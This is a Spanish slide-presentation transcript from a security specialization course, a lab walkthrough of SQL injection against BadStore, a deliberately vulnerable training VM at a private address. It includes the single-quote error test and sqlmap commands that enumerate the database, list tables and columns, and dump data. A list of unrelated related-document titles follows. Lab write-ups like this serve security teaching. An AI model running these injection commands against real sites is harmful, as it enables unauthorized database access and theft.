Upload File

ataque por inyección de código sql

8
Especialización en Seguridad Informática Ataque por inyección de código SQL, JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014

Upload: jose-alfredo-ramirez-prada

Post on 26-Jun-2015

139 views

Category:

Technology


0 download

Report

DESCRIPTION

Ataque realizado a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.

TRANSCRIPT

Page 1: Ataque por inyección de código sql

Especialización en Seguridad Informática

Ataque por inyección de código SQL,

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Page 2: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.

Page 3: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.

Page 4: Ataque por inyección de código sql

Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db

Se confirma la vulnerabilidad  y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.

Page 5: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb --tables

Page 6: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb --columns

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb -C ldesc --dump

Page 7: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

De esta forma obtenemos toda la información sobre la base de datos de Badstore.

Page 8: Ataque por inyección de código sql

Especialización en Seguridad Informática

GRACIAS POR SU ATENCIÓN


Sistemas de Inyección Diesel - turbosybombas.com sistemas... · inyección, según sus aplicaciones y necesidades. Son conocidos como “Bombas de Inyección, o Sistemas de Inyección

Tipos de ataque Tabla de contenidos - ru.iiec.unam.mxru.iiec.unam.mx/4047/1/tipos_de_ataque.pdf · Desbordamiento de buffer Desbordamiento de enteros Inyecciones Inyecciones de SQL

ATAQUES POR INYECCION DE CODIGO SQL Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de

Vento. - Volkswagen México · Alimentación de combustible Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica multipunto Inyección electrónica

INYECCIÓN GASOLINA DIESEL - Unidad 3 - Bomba de Inyección Rotativa

LA INYECCIÓN ELECTRÓNICA. INYECCIÓN ELECTRÓNICA DE COMBUSTIBLE

Descargado de 1/26 · - En una primera fase, se realizó un ataque de inyección de SQL, mediante el cual el atacante pudo averiguar las claves de acceso de los usuarios a los servicios

ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING

Mecanismos de protección contra inyección sql

Ataque, defesa e contra-ataque: Invasãounderpop.online.fr/u/universidade-hacker/cap20-invasao.pdfInvasão Invasão 246 247 Invasão Capítulo Ataque, defesa e contra-ataque: 20 “Abordar

Intrusión Web: Google Dorks e Inyección Sql

ATAQUE POR INYECCIÓN DE CÓDIGO SQL

Intrusión Web: Google Dorks e Inyección Sql³n_SQL_en_Páginas_Web.pdf · Google Dorks e Inyección Sql 20-Marzo-II Jornadas de Prevención del 2015 ... USER | PASSWORD. Ejemplos

1- ANTECEDENTES DEL ATAQUE. 2- PLANIFICACIÓN DEL ATAQUE. 3- ATAQUE DE PEARL HARBOUR. 4- REACCIONES INMEDIATAS

SQL INJECTION DEEP DIVE - OWASP Foundation...Determinar el Tipo de SQL Injection •Identificar la Inyección •Identificar el tipo de Inyección: •STRING •NUMERICO •Tipo de

Inyección de código SQL en MS SQL Server 2005 · código SQL pero centrándose en el motor de bases de datos, MS SQL Server 2005. Se va a obviar si la inyección de código se encuentra

Introducción ¿Por qué Inyección SQL? Definición. Objetivos. Concepto clave. Evaluación de riesgos. Ejemplos sencillos. Prueba en vivo Breve descripción

Inyección de SQL

Equipo de prueba de inyección primaria, inyección

Ataque sql web

METODOLOGÍA DE PRUEBAS DE INYECCIÓN SQL PARA ...apuntesdeinvestigacion.bucaramanga.upb.edu.co/wp-content/...2016/03/03  · SQL injection, attack, security, Web applications. 1

C o n te n i d o - WordPress.com · 2.2 Inyección SQL 18 2.3 Inyección remota de comandos 21 2.4 Exploración de directorios 25 2.5 Manipulación de parámetros 27 2.6 Falla de

Falhas mais comuns em aplicações WEB. Agenda Introdução Explicando cada ataque através de exemplos –URL Manipulation –SQL Injection –XSS Cross Site Scripting

SQL INJECTION - materias.fi.uba.armaterias.fi.uba.ar/6669/alumnos/2006-2/SQLInjection.pdf · Introducción Ataque basado en inyección de código Explota omisiones en la verificación

¡¡Judíos al ataque!! o ¡¡ataque a los judíos!!

AMENAZAS Y SOLUCIONES GUÍA PARA LA SEGURIDAD WEB … · • Robo de datos, como las inyecciones SQL y otros ataques de inyección de comandos ... tráfico a un sitio en un ataque

Inyección Digifant SISTEMA DE ENCENDIDO E INYECCIÓN ......Inyección Digifant SISTEMA DE ENCENDIDO E INYECCIÓN DIGIFANT MODELOS POSTERIORES A ABRIL DE 1987 Sistema 1.Calentamiento

Ataque e Contra-Ataque no Xadrez (Fred Reinfeld) - Português

SISTEMAS DE INYECCIÓN DE GASOLINA K-Jetronic 10 11 · PDF file• inyección multipunto INYECCIÓN MULTIPUNTO INYECCIÓN MONOPUNTO. Miguel Antonio Centeno Sánchez 7 ... Magneti-Marelli,

Seguridad en Aplicaciones Web (II) Computación Web … · Bases de datos SQL (inyección de SQL). Bases de datos XML. ... Desde un sitio Web de terceros o del atacante. Mediante

Inyección Electrónica - 1 de Mecanica del... · Inyección Electrónica - 1 - Inyección Electrónica - 2 - Inyección Electrónica - 3 - Inyección Electrónica - 4 - Inyección

INYECCIÓN DE GASOLINA - iessierradeguara.comiessierradeguara.com/documentos/departamentos/automocion/circuitos... · Tipos de Inyección: MONOPUNTO. Tipos de Inyección: DIRECTA

Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica

ESCUELA SUPERIOR POLITÉCNICA DEL LITORAL · Inyección de SQL. ... débiles, lance un ataque de fuerza bruta, o evite por completo el proceso de inicio de sesión. ... conectamos

Análisis de los Sistemas de Ataque y Protección en …repositorio.espe.edu.ec/bitstream/21000/8435/1/AC... · clave, bajo mecanismos de inyección se llega adivinar la clave, IV